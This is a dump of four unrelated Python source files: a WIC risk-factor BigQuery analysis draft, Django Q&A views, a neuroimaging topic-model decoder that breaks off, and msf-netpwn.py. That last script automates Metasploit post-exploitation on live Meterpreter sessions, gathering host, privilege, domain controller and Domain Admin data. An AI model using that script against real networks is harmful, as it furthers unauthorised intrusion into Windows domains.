bigquery.Client() ##global conn\n\n## decorator\ndef add_datetime(func):\n reVal = ''\n\n def wrapper():\n start = time.perf_counter()\n print(func.__name__, \" : method started\")\n func()\n print(func.__name__, \" : method stopped\")\n\n return reVal\n\n\n## create db connection\ndef get_db_conn():\n return bigquery.Client()\n\n\n## get the query to run\ndef get_query(tableNamePrefix):\n tableName = tableNamePrefix + '_' + year\n baseQuery = \"SELECT * FROM `\" + projectId + \".\" + dbName + \".\" + tableName + \"`\"\n return baseQuery\n\n\n## get specific query\n# @add_datetime\ndef specificQuery(cat):\n queryWhole = \"\"\"SELECT a.*, a.Family_zip as ZipCode, case when a.certification_category in (1,2,3) then b.MomPopulation\n else b.ChildPopulation end as PopEstimates FROM `chmdev.DATASETCHM2021_D1.MD_WIC_2019` a\n left join `chmdev.DATASETCHM2021_D1.MD_PopEstimates2019` b on a.Family_zip= 
b.ZipCode\"\"\"\n\n ### WIC data by catorgery\n ###Mom data\n queryMom = \"\"\"SELECT a.*, a.Family_zip as ZipCode, case when a.certification_category in (1,2,3) then b.MomPopulation\n else b.ChildPopulation end as PopEstimates FROM `chmdev.DATASETCHM2021_D1.MD_WIC_2019` a \n left join `chmdev.DATASETCHM2021_D1.MD_PopEstimates2019` b on a.Family_zip = b.ZipCode\n where a.certification_category in (1, 2, 3)\n \"\"\"\n\n ### Child data\n queryChild = \"\"\"SELECT a.*, a.Family_zip as ZipCode, case when a.certification_category in (1,2,3) then b.MomPopulation\n else b.ChildPopulation end as PopEstimates FROM `chmdev.DATASETCHM2021_D1.MD_WIC_2019` a left\n join `chmdev.DATASETCHM2021_D1.MD_PopEstimates2019` b on a.Family_zip = b.ZipCode \n where a.certification_category in (5)\n \"\"\"\n ### Infant data\n queryInfant = \"\"\"SELECT a.*, a.Family_zip as ZipCode, case when a.certification_category in (1,2,3) then b.MomPopulation\n else b.ChildPopulation end as PopEstimates FROM `chmdev.DATASETCHM2021_D1.MD_WIC_2019` a left\n join `chmdev.DATASETCHM2021_D1.MD_PopEstimates2019` b on a.Family_zip = b.ZipCode \n where a.certification_category in (4)\"\"\"\n\n ## National Risk Factor data\n queryNRF = \"\"\"SELECT * FROM `chmdev.DATASETCHM2021_D1.WIC_RiskFactors`\"\"\"\n\n ## assigning appropriate query\n if(cat == 'all'):\n query = queryWhole\n elif(cat == 'mom'):\n query = queryMom\n elif(cat == 'child'):\n query = queryChild\n elif(cat == 'infant'):\n query = queryInfant\n elif(cat == 'nrf'):\n query = queryNRF\n\n return query\n\n\ndef run_SQL(dbConn, queryString):\n return dbConn.query(queryString).to_dataframe()\n\n## get indicators\ndef get_indicators():\n global dbConn\n queryInd = \"\"\"select case when VarCode='Currently.BF' then 'Currently_BF' when VarCode='Migrant.Status' then 'Migrant_Status'\n when VarCode='Ever.BF' then 'Ever_BF' else Varcode end as Ind \n from (select distinct varcode from `chmdev.DATASETCHM2021_D1.WIC_Codelookup`\n where Dataset= 'WIC' and VarType= 'Indicator' and Varcode \n not in ('FamilyIncome', 'Nutritional.Risk.check', 'Income.Period', 'NRFactor') order by Varcode asc )\"\"\"\n\n dfInd = run_SQL(dbConn,queryInd)\n return dfInd\n\n## get dimensions\ndef get_dimensions():\n global dbConn\n queryDim = \"\"\"select distinct Dim from (select case \n when Varcode in ('AgeRangeMoms', 'AgeRangeChild', 'AgeRangeInfant' ) then 'AgeRange' \n else Varcode end as Dim from `chmdev.DATASETCHM2021_D1.WIC_Codelookup` \n where Dataset= 'WIC' and VarType= 'Dimension' and Varcode not in ('NRFactor'))\"\"\"\n\n dfDim = run_SQL(dbConn,queryDim)\n return dfDim\n\n## get population estimates\ndef get_pop():\n global dbConn\n ##[['ZipCode','ChildPopulation','MomPopulation']]\n queryPop = \"\"\" select * from `chmdev.DATASETCHM2021_D1.MD_PopEstimates2019`\"\"\"\n dfPop = run_SQL(dbConn, queryPop)\n dfPop['PopEstimates'] = dfPop['ChildPopulation'] + dfPop['MomPopulation']\n return dfPop\n\ndef get_riskf():\n global dbConn\n queryRisk = \"\"\" SELECT distinct RF_TYPE_RISK_FACTOR_TYPE_ID as col1 \n FROM `chmdev.DATASETCHM2021_D1.WIC_RiskFactors` where HIGH_RISK_FLAG=1 \"\"\"\n\n dfRisk = run_SQL(dbConn,queryRisk)\n return dfRisk\n\ndef get_risk_factors(dfRisk):\n riskList = dfRisk.iloc[:,0].tolist()\n return riskList\n\n\ndef get_risk_counts(dfWICRisk):\n dfRiskMelt = pd.melt(dfWICRisk, id_vars=\"Family_zip\")\n\n # dfRiskMelt.columns[dfRiskMelt.columns != 'Family_zip'].to_list()\n # kind of gather ***** check later\n ##dfCrossTabRisk = pd.crosstab(index=dfRiskMelt['Family_zip'], 
columns=dfRiskMelt.columns[dfRiskMelt.columns != 'Family_zip'].to_list())\n\n # dfRiskMelt[1:10]\n\n # dfRiskSpreadOut = pd.crosstab(index=[dfRiskMelt['Family_zip'],dfRiskMelt['variable']], columns=dfRiskMelt['value'])\n dfRiskSpreadOut = pd.crosstab(index=dfRiskMelt['Family_zip'], columns=dfRiskMelt['value'])\n dfRiskSpreadOut = dfRiskSpreadOut.reset_index()\n dfRiskZipCountMelt = pd.melt(dfRiskSpreadOut, id_vars=[\"Family_zip\"], var_name='RiskID', value_name='Count')\n\n ## Do not delete these 2 comments\n dfRiskZipCountMelt = dfRiskZipCountMelt.sort_values(by=['Count'], ascending=False)\n # dfRiskZipCountMelt['Count_Denom'].sum()\n\n return dfRiskZipCountMelt\n\n## get totals for that zip in the data in WIC data\ndef get_zip_counts(dfWIC):\n dfWICZip = dfWIC[['Case_ID', 'Family_zip']]\n dfWICZipCounts = dfWICZip.groupby('Family_zip')['Family_zip'].count().reset_index(name='Zip_Counts')\n return dfWICZipCounts\n\n## get age unadjusted rates\ndef get_unadjusted(dfWICNRF, dfRiskCount, dfZipCounts):\n dfTemp1 = dfRiskCount.merge(dfWICNRF, left_on='RiskID',right_on='RF_TYPE_RISK_FACTOR_TYPE_ID')\n dfTemp2 = dfTemp1.merge(dfZipCounts, left_on='Family_zip',right_on='Family_zip')\n print(dfTemp2.columns)\n dfFinal = dfTemp2[['Family_zip','Count', 'CrossWalk','Zip_Counts']]\n dfFinal['Percentage'] = dfFinal['Count']/dfFinal['Zip_Counts']\n\n return dfFinal.drop_duplicates()\n\n## get age/population adjusted rates\ndef get_adjusted(dfWICNRF, dfRiskCount, dfPop):\n\n dfTemp1 = dfRiskCount.merge(dfWICNRF, left_on='RiskID', right_on='RF_TYPE_RISK_FACTOR_TYPE_ID')\n dfTemp2 = dfTemp1.merge(dfPop, left_on='Family_zip', right_on='ZipCode')\n print(dfTemp2.columns)\n dfFinal = dfTemp2[['Family_zip', 'Count', 'CrossWalk', 'PopEstimates', '']]\n dfFinal['Percentage'] = dfFinal['Count'] / dfFinal['PopEstimates']\n\n return dfFinal.drop_duplicates()\n\n\n## run the Stratification by Risk factors\ndef run_strat_rf():\n ## WIC whole\n query = specificQuery('all')\n dfWIC = run_SQL(dbConn, query)\n\n ##WIC NRF\n query = specificQuery('nrf')\n dfWICNRF = run_SQL(dbConn, query)\n\n ## getting the risk factors\n riskList = ['risk_1', 'risk_2', 'risk_3', 'risk_4', 'risk_5', 'risk_6', 'risk_7',\n 'risk_8', 'risk_9', 'risk_10', 'Family_zip']\n dfWICRisk = dfWIC[riskList]\n dfRiskCount = get_risk_counts(dfWICRisk)\n dfZipCounts = get_zip_counts(dfWIC)\n print(dfRiskCount.head())\n print(dfZipCounts.head())\n # m = ZIP counts\n # df = dfRisk counts\n # WIC_NRF\n dfUnadj = get_unadjusted(dfWICNRF, dfRiskCount, dfZipCounts)\n print(dfUnadj.head)\n dfAdj = get_adjusted(dfWICNRF, dfRiskCount, get_pop())\n print(dfAdj.head())\n\ndef run_wic_state_au():\n\n pass\n\n\ndef main():\n ## Steps\n \"\"\"\n 1. read the data from db\n 2. read the codelook ups\n 3. group/slice the data for respective sections\n 4. perform analysis - current version has 3 functions\n 5. ? add metadata\n 6. ? combine the results.\n :return:\n \"\"\"\n ## 1. function to run stratification by risk factor\n run_strat_rf()\n\n ## 2. 
function to run functions for combinations\n\n\n\n## main function\nif (__name__ == '__main__'):\n print(\"Script initiated\")\n main()\n print(\"Script ended\")\n\n\n\n\n\n\n", "sub_path": "wic_draft.py", "file_name": "wic_draft.py", "file_ext": "py", "file_size_in_byte": 8125, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "google.cloud.bigquery.Client", "line_number": 14, "usage_type": "call"}, {"api_name": "google.cloud.bigquery", "line_number": 14, "usage_type": "name"}, {"api_name": "time.perf_counter", "line_number": 21, "usage_type": "call"}, {"api_name": "google.cloud.bigquery.Client", "line_number": 31, "usage_type": "call"}, {"api_name": "google.cloud.bigquery", "line_number": 31, "usage_type": "name"}, {"api_name": "pandas.melt", "line_number": 135, "usage_type": "call"}, {"api_name": "pandas.crosstab", "line_number": 144, "usage_type": "call"}, {"api_name": "pandas.melt", "line_number": 146, "usage_type": "call"}]} +{"seq_id": "56638927", "text": "from django.shortcuts import render\nfrom django.shortcuts import render, Http404, get_object_or_404, HttpResponsePermanentRedirect\nfrom django.http import HttpResponse\nfrom models import Question, Answer\nfrom forms import AskForm, AnswerForm\nfrom django.core.paginator import Paginator\n\ndef test(request, page=2):\n return HttpResponse('
    '+page+'
    ')\n\ndef error (request, *args, **kwargs):\n raise Http404('Not working')\n# Create your views here.\ndef qa_new(request):\n last_questions = Question.objects.order_by('id')\n limit = request.GET.get('limit', 10)\n page = request.GET.get('page', 1)\n paginator = Paginator(last_questions, limit)\n paginator.baseurl = '/?page='\n page = paginator.page(page)\n return render(request, 'qa_new.html', {\n 'last_questions': page.object_list,\n 'paginator': paginator,\n 'page': page,\n })\n\ndef qa_popular(request):\n questions = Question.objects.order_by('-rating')\n limit = request.GET.get('limit', 10)\n page = request.GET.get('page')\n paginator = Paginator(questions, limit)\n paginator.baseurl = '/popular/?page='\n page = paginator.page(page)\n return render(request, 'qa_popular.html', {\n 'questions': page.object_list,\n 'paginator': paginator,\n 'page': page,\n })\n\ndef qa_question(request, question_id):\n question = get_object_or_404(Question, id=question_id)\n answers = Answer.objects.filter(question=question_id)\n if request.method is 'POST':\n return answer_form(request)\n form = AnswerForm()\n context = {\n 'title': question.title,\n 'text': question.text,\n 'answers': answers,\n 'rating': question.rating,\n 'from': form,\n }\n return render(request, 'qa_question.html', context)\n", "sub_path": "ask/qa/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 1776, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "django.http.HttpResponse", "line_number": 9, "usage_type": "call"}, {"api_name": "django.shortcuts.Http404", "line_number": 12, "usage_type": "call"}, {"api_name": "models.Question.objects.order_by", "line_number": 15, "usage_type": "call"}, {"api_name": "models.Question.objects", "line_number": 15, "usage_type": "attribute"}, {"api_name": "models.Question", "line_number": 15, "usage_type": "name"}, {"api_name": "django.core.paginator.Paginator", "line_number": 18, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 21, "usage_type": "call"}, {"api_name": "models.Question.objects.order_by", "line_number": 28, "usage_type": "call"}, {"api_name": "models.Question.objects", "line_number": 28, "usage_type": "attribute"}, {"api_name": "models.Question", "line_number": 28, "usage_type": "name"}, {"api_name": "django.core.paginator.Paginator", "line_number": 31, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 34, "usage_type": "call"}, {"api_name": "django.shortcuts.get_object_or_404", "line_number": 41, "usage_type": "call"}, {"api_name": "models.Question", "line_number": 41, "usage_type": "argument"}, {"api_name": "models.Answer.objects.filter", "line_number": 42, "usage_type": "call"}, {"api_name": "models.Answer.objects", "line_number": 42, "usage_type": "attribute"}, {"api_name": "models.Answer", "line_number": 42, "usage_type": "name"}, {"api_name": "forms.AnswerForm", "line_number": 45, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 53, "usage_type": "call"}]} +{"seq_id": "321796321", "text": "#!/usr/bin/env python3\n\nimport re\nimport os\nimport sys\nimport time\nimport signal\nimport msfrpc\nimport asyncio\nimport argparse\nimport netifaces\nfrom IPython import embed\nfrom termcolor import colored\nfrom netaddr import IPNetwork, AddrFormatError\nfrom subprocess import Popen, PIPE, CalledProcessError\n\nBUSY_SESSIONS = []\n\ndef parse_args():\n # Create the arguments\n parser = 
argparse.ArgumentParser()\n parser.add_argument(\"-l\", \"--hostlist\", help=\"Host list file\")\n parser.add_argument(\"-p\", \"--password\", default='123', help=\"Password for msfrpc\")\n parser.add_argument(\"-u\", \"--username\", default='msf', help=\"Username for msfrpc\")\n return parser.parse_args()\n\n# Colored terminal output\ndef print_bad(msg):\n print((colored('[-] ', 'red') + msg))\n\ndef print_info(msg):\n print((colored('[*] ', 'blue') + msg))\n\ndef print_good(msg):\n print((colored('[+] ', 'green') + msg))\n\ndef print_great(msg):\n print((colored('[!] {}'.format(msg), 'yellow', attrs=['bold'])))\n\ndef kill_tasks():\n print()\n print_info('Killing tasks then exiting...')\n for task in asyncio.Task.all_tasks():\n task.cancel()\n\ndef get_iface():\n '''\n Gets the right interface for Responder\n '''\n try:\n iface = netifaces.gateways()['default'][netifaces.AF_INET][1]\n except:\n ifaces = []\n for iface in netifaces.interfaces():\n # list of ipv4 addrinfo dicts\n ipv4s = netifaces.ifaddresses(iface).get(netifaces.AF_INET, [])\n\n for entry in ipv4s:\n addr = entry.get('addr')\n if not addr:\n continue\n if not (iface.startswith('lo') or addr.startswith('127.')):\n ifaces.append(iface)\n\n iface = ifaces[0]\n\n return iface\n\ndef get_local_ip(iface):\n '''\n Gets the the local IP of an interface\n '''\n ip = netifaces.ifaddresses(iface)[netifaces.AF_INET][0]['addr']\n return ip\n\nasync def get_shell_info(CLIENT, sess_num):\n sysinfo_cmd = 'sysinfo'\n sysinfo_end_str = b'Meterpreter : '\n\n sysinfo_output = await run_session_cmd(CLIENT, sess_num, sysinfo_cmd, sysinfo_end_str)\n # Catch error\n if type(sysinfo_output) == str:\n return sysinfo_output\n\n else:\n sysinfo_utf8_out = sysinfo_output.decode('utf8')\n sysinfo_split = sysinfo_utf8_out.splitlines()\n\n getuid_cmd = 'getuid'\n getuid_end_str = b'Server username:'\n\n getuid_output = await run_session_cmd(CLIENT, sess_num, getuid_cmd, getuid_end_str)\n # Catch error\n if type(getuid_output) == str:\n return getuid_output\n else:\n getuid_utf8_out = getuid_output.decode('utf8')\n getuid = 'User : '+getuid_utf8_out.split('Server username: ')[-1].strip().strip()\n\n # We won't get here unless there's no errors\n shell_info_list = [getuid] + sysinfo_split\n\n return shell_info_list\n\ndef get_domain(shell_info):\n for l in shell_info:\n l_split = l.split(':')\n if 'Domain ' in l_split[0]:\n if 'WORKGROUP' in l_split[1]:\n return False\n else:\n domain = l_split[-1].strip()\n return domain\n\ndef is_domain_joined(user_info, domain):\n info_split = user_info.split(':')\n dom_and_user = info_split[1].strip()\n dom_and_user_split = dom_and_user.split('\\\\')\n dom = dom_and_user_split[0]\n user = dom_and_user_split[1]\n if domain:\n if dom.lower() in domain.lower():\n return True\n\n return False\n\ndef print_shell_data(shell_info, admin_shell, local_admin, sess_num_str):\n print_info('New shell info')\n for l in shell_info:\n print(' '+l)\n msg = ''' Admin shell : {}\n Local admin : {}\n Session number : {}'''.format( \n admin_shell.decode('utf8'), \n local_admin.decode('utf8'),\n sess_num_str)\n print(msg)\n\nasync def sess_first_check(CLIENT, session, sess_num):\n if b'first_check' not in session:\n print_good('Session {} found, gathering shell info...'.format(str(sess_num)))\n\n # Give meterpeter chance to open\n await asyncio.sleep(2)\n\n sess_num_str = str(sess_num)\n session[b'first_check'] = b'False'\n session[b'session_number'] = sess_num_str.encode()\n\n shell_info = await get_shell_info(CLIENT, sess_num)\n # Catch 
errors\n if type(shell_info) == str:\n session[b'error'] = shell_info.encode()\n return session\n\n # returns either a string of the domain name or False\n domain = get_domain(shell_info)\n if domain:\n session[b'domain'] = domain.encode()\n\n domain_joined = is_domain_joined(shell_info[0], domain)\n if domain_joined == True:\n session[b'domain_joined'] = b'True'\n else:\n session[b'domain_joined'] = b'False'\n\n admin_shell, local_admin = await is_admin(CLIENT, sess_num)\n # Catch errors\n if type(admin_shell) == str:\n session[b'error'] = admin_shell.encode()\n return session\n\n session[b'admin_shell'] = admin_shell\n session[b'local_admin'] = local_admin\n\n print_shell_data(shell_info, admin_shell, local_admin, sess_num_str)\n\n return session\n\nasync def is_admin(CLIENT, sess_num):\n cmd = 'run post/windows/gather/win_privs'\n\n output = await run_session_cmd(CLIENT, sess_num, cmd, None)\n # Catch error\n if type(output) == str:\n return (output, None)\n\n if output:\n split_out = output.decode('utf8').splitlines()\n user_info_list = split_out[5].split()\n admin_shell = user_info_list[0]\n system = user_info_list[1]\n local_admin = user_info_list[2]\n user = user_info_list[5]\n\n # Byte string\n return (str(admin_shell).encode(), str(local_admin).encode())\n\n else:\n return (b'ERROR', b'ERROR')\n\nasync def get_domain_controller(CLIENT, domain_data, sess_num):\n print_info('Getting domain controller...')\n cmd = 'run post/windows/gather/enum_domains'\n end_str = b'[+] Domain Controller:'\n output = await run_session_cmd(CLIENT, sess_num, cmd, end_str)\n\n # Catch timeout\n if type(output) == str:\n domain_data['err'].append(sess_num)\n return domain_data\n\n output = output.decode('utf8')\n if 'Domain Controller: ' in output:\n dc = output.split('Domain Controller: ')[-1].strip()\n domain_data['domain_controllers'].append(dc)\n print_good('Domain controller: '+dc)\n else:\n print_bad('No domain controller found')\n\n return domain_data\n\nasync def get_domain_admins(CLIENT, domain_data, sess_num):\n print_info('Getting domain admins...')\n cmd = 'run post/windows/gather/enum_domain_group_users GROUP=\"Domain Admins\"'\n end_str = b'[+] User list'\n\n output = await run_session_cmd(CLIENT, sess_num, cmd, end_str)\n # Catch timeout\n if type(output) == str:\n domain_data['err'].append(sess_num)\n return domain_data\n\n output = output.decode('utf8')\n da_line_start = '[*] \\t'\n\n if da_line_start in output:\n split_output = output.splitlines()\n print_info('Domain admins:')\n\n domain_admins = []\n for l in split_output:\n if l.startswith(da_line_start):\n domain_admin = l.split(da_line_start)[-1].strip()\n domain_admins.append(domain_admin)\n print(' '+domain_admin)\n domain_data['domain_admins'] = domain_admins\n\n else:\n print_bad('No domain admins found')\n sys.exit()\n\n return domain_data\n\nasync def get_domain_data(CLIENT, session, sess_num, domain_data):\n # Check if we did domain recon yet\n if domain_data['domain_admins'] == []:\n if session[b'domain_joined'] == b'True':\n domain_data = await get_domain_controller(CLIENT, domain_data, sess_num)\n domain_data = await get_domain_admins(CLIENT, domain_data, sess_num)\n\n return domain_data\n\nasync def attack_with_sessions(CLIENT, sessions, domain_data):\n\n if len(sessions) > 0:\n\n for s in sessions:\n\n # Get and print session info if first time we've checked the session\n sessions[s] = await sess_first_check(CLIENT, sessions[s], s)\n \n # Update domain data\n if b'domain' in sessions[s]:\n 
domain_data['domains'].append(sessions[s][b'domain'])\n\n if domain_data['domain_admins'] == []:\n domain_data = await get_domain_data(CLIENT, sessions[s], s, domain_data)\n\n return (sessions, domain_data)\n\ndef get_output(CLIENT, cmd, sess_num):\n output = CLIENT.call('session.meterpreter_read', [str(sess_num)])\n\n # Everythings fine\n if b'data' in output:\n return output[b'data']\n\n # Got an error from the CLIENT.call\n elif b'error_message' in output:\n decoded_err = output[b'error_message'].decode('utf8')\n print_bad(error_msg.format(sess_num_str, decoded_err))\n return decoded_err\n\n # Some other error catchall\n else:\n return cmd\n\ndef get_output_errors(output, counter, cmd, sess_num, timeout, sleep_secs):\n script_errors = [b'[-] post failed', \n b'error in script', \n b'operation failed', \n b'unknown command', \n b'operation timed out']\n\n # Got an error from output\n if any(x in output.lower() for x in script_errors):\n print_bad(('Command [{}] in session {} '\n 'failed with error: {}'\n ).format(cmd, str(sess_num), output.decode('utf8')))\n return cmd, counter\n\n # If no terminating string specified just wait til timeout\n if output == b'':\n counter += sleep_secs\n if counter > timeout:\n print_bad('Command [{}] in session {} timed out'.format(cmd, str(sess_num)))\n return 'timed out', counter\n\n # No output but we haven't reached timeout yet\n return output, counter\n\nasync def run_session_cmd(CLIENT, sess_num, cmd, end_str, timeout=30):\n ''' Will only return a str if we failed to run a cmd'''\n global BUSY_SESSIONS\n\n error_msg = 'Error in session {}: {}'\n sess_num_str = str(sess_num)\n\n print_info('Running [{}] on session {}'.format(cmd, str(sess_num)))\n\n while sess_num in BUSY_SESSIONS:\n await asyncio.sleep(.1)\n\n BUSY_SESSIONS.append(sess_num)\n\n res = CLIENT.call('session.meterpreter_run_single', [str(sess_num), cmd])\n\n if b'error_message' in res:\n err_msg = res[b'error_message'].decode('utf8')\n print_bad(error_msg.format(sess_num_str, err_msg))\n return err_msg\n\n elif res[b'result'] == b'success':\n\n counter = 0\n sleep_secs = 0.5\n\n try:\n while True:\n await asyncio.sleep(sleep_secs)\n\n output = get_output(CLIENT, cmd, sess_num)\n # Error from meterpreter console\n if type(output) == str:\n BUSY_SESSIONS.remove(sess_num)\n return output\n\n # Successfully completed\n if end_str:\n if end_str in output:\n BUSY_SESSIONS.remove(sess_num)\n return output\n # If no end_str specified just return once we have any data\n else:\n if len(output) > 0:\n BUSY_SESSIONS.remove(sess_num)\n return output\n\n # Check for errors from cmd's output\n output, counter = get_output_errors(output, counter, cmd, sess_num, timeout, sleep_secs)\n # Error from cmd output including timeout\n if type(output) == str:\n BUSY_SESSIONS.remove(sess_num)\n return output\n\n # This usually occurs when the session suddenly dies or user quits it\n except Exception as e:\n err = 'exception below likely due to abrupt death of session'\n print_bad(error_msg.format(sess_num_str, err))\n print_bad(' '+str(e))\n BUSY_SESSIONS.remove(sess_num)\n return err\n\n # b'result' not in res, b'error_message' not in res, just catch everything else as an error\n else:\n print_bad(res[b'result'].decode('utf8'))\n BUSY_SESSIONS.remove(sess_num)\n return cmd\n \ndef get_perm_token(CLIENT):\n # Authenticate and grab a permanent token\n CLIENT.login(args.username, args.password)\n CLIENT.call('auth.token_add', ['123'])\n CLIENT.token = '123'\n return CLIENT\n\ndef 
filter_broken_sessions(updated_sessions):\n ''' We remove 2 kinds of errored sessions: 1) timed out on sysinfo 2) shell died abruptly '''\n unbroken_sessions = {}\n\n for s in updated_sessions:\n if b'error' in updated_sessions[s]:\n # Session timed out on initial sysinfo cmd\n if b'domain' not in updated_sessions[s]:\n continue\n # Session abruptly died\n elif updated_sessions[s][b'error'] == b'exception below likely due to abrupt death of session':\n continue\n\n unbroken_sessions[s] = updated_sessions[s]\n\n return unbroken_sessions\n\ndef update_sessions(sessions, updated_sessions):\n ''' Four keys added after we process a new session: \n first_check, domain_joined, local_admin, admin_shell \n This function does not overwrite data from MSF\n it only adds previously known data to the MSF session'''\n if updated_sessions:\n udpated_sessions = filter_broken_sessions(updated_sessions)\n\n # s = session number, sessions[s] = session data dict\n for s in sessions:\n if s in updated_sessions:\n for k in updated_sessions[s]:\n if k not in sessions[s]:\n sessions[s][k] = updated_sessions[s].get(k)\n\n return sessions\n\nasync def check_for_sessions(CLIENT):\n domain_data = {'domains':[], \n 'domain_controllers':[], \n 'domain_admins':[], \n 'err':[]}\n updated_sessions = None\n print_info('Waiting for Meterpreter shell')\n\n while True:\n\n # Get list of MSF sessions from RPC server\n sessions = CLIENT.call('session.list')\n\n # Update the session info dict with previously found information\n sessions = update_sessions(sessions, updated_sessions)\n\n # Do stuff with the sessions\n updated_sessions, domain_data = await attack_with_sessions(CLIENT, sessions, domain_data)\n \n await asyncio.sleep(10)\n\ndef main(args):\n\n CLIENT = msfrpc.Msfrpc({})\n CLIENT = get_perm_token(CLIENT)\n\n loop = asyncio.get_event_loop()\n loop.add_signal_handler(signal.SIGINT, kill_tasks)\n task = asyncio.ensure_future(check_for_sessions(CLIENT))\n try:\n loop.run_until_complete(task)\n except asyncio.CancelledError:\n print_info('Tasks gracefully downed a cyanide pill before defecating themselves and collapsing in a twitchy pile')\n finally:\n loop.close()\n\nif __name__ == \"__main__\":\n args = parse_args()\n if os.geteuid():\n print_bad('Run as root')\n sys.exit()\n main(args)\n\n", "sub_path": "msf-netpwn.py", "file_name": "msf-netpwn.py", "file_ext": "py", "file_size_in_byte": 15336, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "argparse.ArgumentParser", "line_number": 21, "usage_type": "call"}, {"api_name": "termcolor.colored", "line_number": 29, "usage_type": "call"}, {"api_name": "termcolor.colored", "line_number": 32, "usage_type": "call"}, {"api_name": "termcolor.colored", "line_number": 35, "usage_type": "call"}, {"api_name": "termcolor.colored", "line_number": 38, "usage_type": "call"}, {"api_name": "asyncio.Task.all_tasks", "line_number": 43, "usage_type": "call"}, {"api_name": "asyncio.Task", "line_number": 43, "usage_type": "attribute"}, {"api_name": "netifaces.gateways", "line_number": 51, "usage_type": "call"}, {"api_name": "netifaces.AF_INET", "line_number": 51, "usage_type": "attribute"}, {"api_name": "netifaces.interfaces", "line_number": 54, "usage_type": "call"}, {"api_name": "netifaces.ifaddresses", "line_number": 56, "usage_type": "call"}, {"api_name": "netifaces.AF_INET", "line_number": 56, "usage_type": "attribute"}, {"api_name": "netifaces.ifaddresses", "line_number": 73, "usage_type": "call"}, {"api_name": 
"netifaces.AF_INET", "line_number": 73, "usage_type": "attribute"}, {"api_name": "asyncio.sleep", "line_number": 144, "usage_type": "call"}, {"api_name": "sys.exit", "line_number": 251, "usage_type": "call"}, {"api_name": "asyncio.sleep", "line_number": 333, "usage_type": "call"}, {"api_name": "asyncio.sleep", "line_number": 351, "usage_type": "call"}, {"api_name": "asyncio.sleep", "line_number": 451, "usage_type": "call"}, {"api_name": "msfrpc.Msfrpc", "line_number": 455, "usage_type": "call"}, {"api_name": "asyncio.get_event_loop", "line_number": 458, "usage_type": "call"}, {"api_name": "signal.SIGINT", "line_number": 459, "usage_type": "attribute"}, {"api_name": "asyncio.ensure_future", "line_number": 460, "usage_type": "call"}, {"api_name": "asyncio.CancelledError", "line_number": 463, "usage_type": "attribute"}, {"api_name": "os.geteuid", "line_number": 470, "usage_type": "call"}, {"api_name": "sys.exit", "line_number": 472, "usage_type": "call"}]} +{"seq_id": "598225079", "text": "# emacs: -*- mode: python-mode; py-indent-offset: 4; tab-width: 4; indent-tabs-mode: nil -*-\n# ex: set sts=4 ts=4 sw=4 et:\n\"\"\"\nClass and functions for functional decoding.\n\"\"\"\nfrom __future__ import print_function, division\n\nfrom builtins import object\nimport numpy as np\nimport pandas as pd\nimport nibabel as nib\nfrom nilearn.masking import apply_mask, unmask\nfrom sklearn.feature_extraction.text import CountVectorizer\n\nfrom .due import due, Doi\n\n\n@due.dcite(Doi('10.1371/journal.pcbi.1005649'),\n description='Describes decoding methods using GC-LDA.')\nclass Decoder(object):\n \"\"\"\n Class object for a gcLDA decoder\n \"\"\"\n def __init__(self, model):\n \"\"\"\n Class object for a gcLDA decoder\n \"\"\"\n self.model = model\n self.dataset = model.dataset\n\n def decode_roi(self, roi, topic_priors=None):\n \"\"\"\n Perform image-to-text decoding for discrete image inputs (e.g., regions\n of interest, significant clusters).\n\n 1. Compute p_topic_g_voxel.\n - I think you need p_voxel_g_topic for this, then you do:\n - p_topic_g_voxel = p_voxel_g_topic * p_topic / p_voxel\n - What is p_voxel here?\n 2. Compute topic weight vector (tau_t).\n - topic_weights = np.sum(p_topic_g_voxel, axis=1) (across voxels)\n 3. Multiply tau_t by topic-by-word matrix (p_word_g_topic).\n 4. 
The resulting vector (tau_t*p_word_g_topic) should be word weights\n for your selected studies.\n \"\"\"\n if type(roi) == str:\n roi = nib.load(roi)\n\n if not np.array_equal(roi.affine, self.model.dataset.mask_img.affine):\n str1 = np.array2string(roi.affine)\n str2 = np.array2string(self.model.dataset.mask_img.affine)\n raise ValueError('Input roi must have same affine as mask img:'\n '\\n{0}\\n{1}'.format(str1, str2))\n\n # Load ROI file and get ROI voxels overlapping with brain mask\n roi_arr = roi.get_data() & self.model.dataset.mask_img.get_data()\n roi_voxels = np.where(roi_arr > 0)[0]\n\n p_topic_g_voxel, _ = self.model.get_spatial_probs()\n p_topic_g_roi = p_topic_g_voxel[roi_voxels, :] # p(T|V) for voxels in ROI only\n topic_weights = np.sum(p_topic_g_roi, axis=0) # Sum across words\n if topic_priors is not None:\n topic_weights *= topic_priors\n topic_weights /= np.sum(topic_weights) # tau_t\n\n # Multiply topic_weights by topic-by-word matrix (p_word_g_topic).\n n_word_tokens_per_topic = np.sum(self.model.n_word_tokens_word_by_topic, axis=0)\n p_word_g_topic = self.model.n_word_tokens_word_by_topic / n_word_tokens_per_topic[None, :]\n p_word_g_topic = np.nan_to_num(p_word_g_topic, 0)\n word_weights = np.dot(p_word_g_topic, topic_weights)\n\n decoded_df = pd.DataFrame(index=self.model.dataset.word_labels, columns=['Weight'],\n data=word_weights)\n decoded_df.index.name = 'Term'\n return decoded_df, topic_weights\n\n def decode_continuous(self, image, topic_priors=None):\n \"\"\"\n Perform image-to-text decoding for continuous inputs (e.g.,\n unthresholded statistical maps).\n\n 1. Compute p_topic_g_voxel.\n 2. Compute topic weight vector (tau_t) by multiplying p_topic_g_voxel\n by input image.\n 3. Multiply tau_t by topic-by-word matrix (p_word_g_topic).\n 4. The resulting vector (tau_t*p_word_g_topic) should be word weights\n for your map, but the values are scaled based on the input image, so\n they won't necessarily mean much.\n \"\"\"\n # Load image file and get voxel values\n input_values = apply_mask(image, self.model.dataset.mask_img)\n p_topic_g_voxel, _ = self.model.get_spatial_probs()\n topic_weights = np.abs(np.squeeze(np.dot(p_topic_g_voxel.T, input_values[:, None])))\n if topic_priors is not None:\n topic_weights *= topic_priors\n topic_weights /= np.sum(topic_weights) # tau_t\n\n # Multiply topic_weights by 